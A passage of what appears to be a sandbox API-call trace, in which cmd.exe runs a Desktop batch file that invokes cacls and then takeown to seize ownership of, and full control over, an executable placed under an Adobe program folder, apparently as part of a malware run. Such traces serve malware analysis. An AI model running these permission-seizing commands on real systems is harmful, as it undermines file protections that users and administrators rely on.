_wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0240.037] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0240.037] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0240.037] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0240.037] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0240.037] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0240.038] GetProcessHeap () returned 0x4f0000 [0240.038] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x504160 [0240.038] SetErrorMode (uMode=0x0) returned 0x0 [0240.038] SetErrorMode (uMode=0x1) returned 0x0 [0240.038] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x504168, lpFilePart=0x32ee78 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32ee78*="Desktop") returned 0x25 [0240.038] SetErrorMode (uMode=0x0) returned 0x1 [0240.038] GetProcessHeap () returned 0x4f0000 [0240.038] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x504160, Size=0x60) returned 0x504160 [0240.038] GetProcessHeap () returned 0x4f0000 [0240.038] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504160) returned 0x60 [0240.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0240.038] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0240.038] GetProcessHeap () returned 0x4f0000 [0240.038] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x5041c8 [0240.038] GetProcessHeap () returned 0x4f0000 [0240.038] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x5042f0 [0240.041] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0240.041] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0xffffffff [0240.041] GetLastError () returned 0x2 [0240.041] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0xffffffff [0240.042] GetLastError () returned 0x2 [0240.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0240.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0x5044a0 [0240.042] GetProcessHeap () returned 0x4f0000 [0240.042] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5017e0, Size=0x4) returned 0x5017e0 [0240.042] FindClose (in: hFindFile=0x5044a0 | out: hFindFile=0x5044a0) returned 1 [0240.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0xffffffff [0240.043] GetLastError () returned 0x2 [0240.043] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0x5044a0 [0240.043] FindClose (in: hFindFile=0x5044a0 | out: hFindFile=0x5044a0) returned 1 [0240.043] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0240.043] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0240.043] GetConsoleTitleW (in: lpConsoleTitle=0x32ec44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0240.044] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x504778, lpFilePart=0x32e764 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32e764*="Desktop") returned 0x25 [0240.044] SetErrorMode (uMode=0x0) returned 0x1 [0240.044] GetProcessHeap () returned 0x4f0000 [0240.044] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x504770, Size=0x60) returned 0x504770 [0240.044] GetProcessHeap () returned 0x4f0000 [0240.044] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504770) returned 0x60 [0240.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0240.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0240.044] GetProcessHeap () returned 0x4f0000 [0240.044] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x5047d8 [0240.044] GetProcessHeap () returned 0x4f0000 [0240.044] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x504900 [0240.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0240.045] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0xffffffff [0240.045] GetLastError () returned 0x2 [0240.045] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0xffffffff [0240.045] GetLastError () returned 0x2 [0240.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0240.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0x504ab0 [0240.046] FindClose (in: hFindFile=0x504ab0 | out: hFindFile=0x504ab0) returned 1 [0240.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0xffffffff [0240.046] GetLastError () returned 0x2 [0240.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0x504ab0 [0240.047] FindClose (in: hFindFile=0x504ab0 | out: hFindFile=0x504ab0) returned 1 [0240.047] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0240.047] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0240.047] GetConsoleTitleW (in: lpConsoleTitle=0x32e9d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0240.047] InitializeProcThreadAttributeList (in: lpAttributeList=0x32e860, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32e928 | out: lpAttributeList=0x32e860, lpSize=0x32e928) returned 1 [0240.047] UpdateProcThreadAttribute (in: lpAttributeList=0x32e860, dwFlags=0x0, Attribute=0x60001, lpValue=0x32e920, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32e860, lpPreviousValue=0x0) returned 1 [0240.047] GetStartupInfoW (in: lpStartupInfo=0x32e81c | out: lpStartupInfo=0x32e81c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0240.047] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0240.049] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files (x86)\\Adobe\\accupos.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32e8bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files (x86)\\Adobe\\accupos.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32e908 | out: lpCommandLine="cacls \"C:\\Program Files (x86)\\Adobe\\accupos.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x32e908*(hProcess=0x74, hThread=0x78, dwProcessId=0xb30, dwThreadId=0xb14)) returned 1 [0240.379] CloseHandle (hObject=0x78) returned 1 [0240.379] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0240.379] GetProcessHeap () returned 0x4f0000 [0240.379] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505f80 | out: hHeap=0x4f0000) returned 1 [0240.379] GetEnvironmentStringsW () returned 0x504bf8* [0240.379] GetProcessHeap () returned 0x4f0000 [0240.379] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x505f80 [0240.379] FreeEnvironmentStringsW (penv=0x504bf8) returned 1 [0240.379] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0243.233] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x32e7fc | out: lpExitCode=0x32e7fc*=0x1f57) returned 1 [0243.233] CloseHandle (hObject=0x74) returned 1 [0243.234] _vsnwprintf (in: _Buffer=0x32e944, _BufferCount=0x13, _Format="%08X", _ArgList=0x32e808 | out: _Buffer="00001F57") returned 8 [0243.234] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0243.234] GetProcessHeap () returned 0x4f0000 [0243.234] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505f80 | out: hHeap=0x4f0000) returned 1 [0243.234] GetEnvironmentStringsW () returned 0x505f80* [0243.234] GetProcessHeap () returned 0x4f0000 [0243.234] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x506ae8 [0243.234] FreeEnvironmentStringsW (penv=0x505f80) returned 1 [0243.234] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0243.234] GetProcessHeap () returned 0x4f0000 [0243.234] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae8 | out: hHeap=0x4f0000) returned 1 [0243.234] GetEnvironmentStringsW () returned 0x505f80* [0243.234] GetProcessHeap () returned 0x4f0000 [0243.234] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x506ae8 [0243.234] FreeEnvironmentStringsW (penv=0x505f80) returned 1 [0243.234] GetProcessHeap () returned 0x4f0000 [0243.234] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f0ce8 | out: hHeap=0x4f0000) returned 1 [0243.234] DeleteProcThreadAttributeList (in: lpAttributeList=0x32e860 | out: lpAttributeList=0x32e860) [0243.234] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.234] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0243.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0243.235] _get_osfhandle (_FileHandle=0) returned 0x3 [0243.235] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0243.236] SetConsoleInputExeNameW () returned 0x1 [0243.236] GetConsoleOutputCP () returned 0x1b5 [0243.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0243.236] SetThreadUILanguage (LangId=0x0) returned 0x409 [0243.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x32f07c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0243.237] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0243.237] _get_osfhandle (_FileHandle=3) returned 0x74 [0243.237] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0243.237] GetProcessHeap () returned 0x4f0000 [0243.237] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504a30 | out: hHeap=0x4f0000) returned 1 [0243.237] GetProcessHeap () returned 0x4f0000 [0243.237] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504900 | out: hHeap=0x4f0000) returned 1 [0243.237] GetProcessHeap () returned 0x4f0000 [0243.237] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5047d8 | out: hHeap=0x4f0000) returned 1 [0243.237] GetProcessHeap () returned 0x4f0000 [0243.237] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504770 | out: hHeap=0x4f0000) returned 1 [0243.237] GetProcessHeap () returned 0x4f0000 [0243.237] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5046b8 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5044a0 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504420 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5042f0 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5041c8 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504160 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f1218 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4ff4b8 | out: hHeap=0x4f0000) returned 1 [0243.238] GetProcessHeap () returned 0x4f0000 [0243.238] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f11b8 | out: hHeap=0x4f0000) returned 1 [0243.238] _get_osfhandle (_FileHandle=3) returned 0x74 [0243.238] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0243.238] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x32f060, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x32f060*=0xc2, lpOverlapped=0x0) returned 1 [0243.239] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0243.239] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0243.240] _get_osfhandle (_FileHandle=3) returned 0x74 [0243.240] GetFileType (hFile=0x74) returned 0x1 [0243.240] _get_osfhandle (_FileHandle=3) returned 0x74 [0243.240] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0243.240] GetProcessHeap () returned 0x4f0000 [0243.240] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x514af8 [0243.241] GetProcessHeap () returned 0x4f0000 [0243.241] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x514af8 | out: hHeap=0x4f0000) returned 1 [0243.243] _tell (_FileHandle=3) returned 47 [0243.243] _close (_FileHandle=3) returned 0 [0243.243] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ee34 | out: _Buffer="\r\n") returned 2 [0243.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.243] GetFileType (hFile=0x7) returned 0x2 [0243.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.244] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf4 | out: lpMode=0x32edf4) returned 1 [0243.244] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.244] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ee20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ee20*=0x2) returned 1 [0243.246] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0243.246] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.247] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x32ee30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0243.247] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x32ee30 | out: _Buffer=">") returned 1 [0243.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.247] GetFileType (hFile=0x7) returned 0x2 [0243.247] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.247] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf8 | out: lpMode=0x32edf8) returned 1 [0243.248] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.248] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32ee24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x32ee24*=0x26) returned 1 [0243.248] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.248] GetFileType (hFile=0x7) returned 0x2 [0243.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.249] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f07c | out: lpMode=0x32f07c) returned 1 [0243.249] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.249] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x505768*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x32f0a8, lpReserved=0x0 | out: lpBuffer=0x505768*, lpNumberOfCharsWritten=0x32f0a8*=0x7) returned 1 [0243.249] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32f0b4 | out: _Buffer=" /F \"C:\\Program Files (x86)\\Adobe\\accupos.exe\" ") returned 47 [0243.249] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.249] GetFileType (hFile=0x7) returned 0x2 [0243.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.250] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0243.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x2f) returned 1 [0243.252] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32f0d4 | out: _Buffer="\r\n") returned 2 [0243.252] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.252] GetFileType (hFile=0x7) returned 0x2 [0243.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.253] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f094 | out: lpMode=0x32f094) returned 1 [0243.253] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.253] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0c0*=0x2) returned 1 [0243.255] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0243.255] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0243.255] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0243.255] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0243.255] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0243.255] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0243.255] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0243.255] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0243.255] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0243.256] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0243.256] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0243.256] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0243.256] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0243.256] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0243.256] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0243.256] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0243.256] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0243.256] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0243.256] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0243.256] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0243.256] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0243.256] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0243.256] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0243.256] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0243.256] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0243.256] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0243.256] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0243.256] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0243.256] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0243.256] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0243.257] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0243.257] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0243.257] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0243.257] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0243.257] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0243.257] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0243.257] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0243.257] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0243.257] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0243.257] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0243.257] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0243.257] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0243.258] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x504168, lpFilePart=0x32ee78 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32ee78*="Desktop") returned 0x25 [0243.258] SetErrorMode (uMode=0x0) returned 0x1 [0243.258] GetProcessHeap () returned 0x4f0000 [0243.258] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x504160, Size=0x64) returned 0x504160 [0243.258] GetProcessHeap () returned 0x4f0000 [0243.258] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x504160) returned 0x64 [0243.258] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.258] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0243.258] GetProcessHeap () returned 0x4f0000 [0243.258] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x5041d0 [0243.259] GetProcessHeap () returned 0x4f0000 [0243.259] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x5042f8 [0243.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.259] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0xffffffff [0243.259] GetLastError () returned 0x2 [0243.260] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0xffffffff [0243.260] GetLastError () returned 0x2 [0243.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.260] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0x4f1288 [0243.261] FindClose (in: hFindFile=0x4f1288 | out: hFindFile=0x4f1288) returned 1 [0243.261] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0xffffffff [0243.261] GetLastError () returned 0x2 [0243.261] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf4) returned 0x4f1288 [0243.262] FindClose (in: hFindFile=0x4f1288 | out: hFindFile=0x4f1288) returned 1 [0243.262] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0243.262] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0243.262] GetConsoleTitleW (in: lpConsoleTitle=0x32ec44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.262] GetFullPathNameW (in: lpFileName=".", 